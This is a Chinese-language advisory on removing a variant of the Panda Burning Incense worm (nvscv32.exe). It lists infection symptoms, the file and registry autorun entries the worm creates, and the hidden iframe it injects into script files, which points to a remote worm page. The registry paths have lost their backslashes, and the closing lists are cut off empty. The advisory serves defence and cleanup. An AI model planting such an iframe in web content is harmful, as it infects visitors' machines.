熊猫烧香病毒nvscv32.exe变种手动清除方案

　　发现时间：2007.1.16

　　危害等级：高

　　四、中毒现象

　　1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。

　　2：无法手工修改“文件夹选项”将隐藏文件显示出来。

　　3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16

　　4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

　　5：中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

　　6：不能正常使用任务管理器，SREng.exe等工具。

　　7：无故的向外发包，连接局域网中其他机器。

　　五、技术分析

　　1：病毒文件运行后，将自身复制到%SystemRoot%system32drivers vscv32.exe

　　建立注册表自启动项：

　　[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

　　nvscv32: "C:WINDOWSsystem32drivers vscv32.exe"

　　2：查找反病毒窗体病毒结束相关进程：

　　3：结束以下进程

　　4：禁用下列服务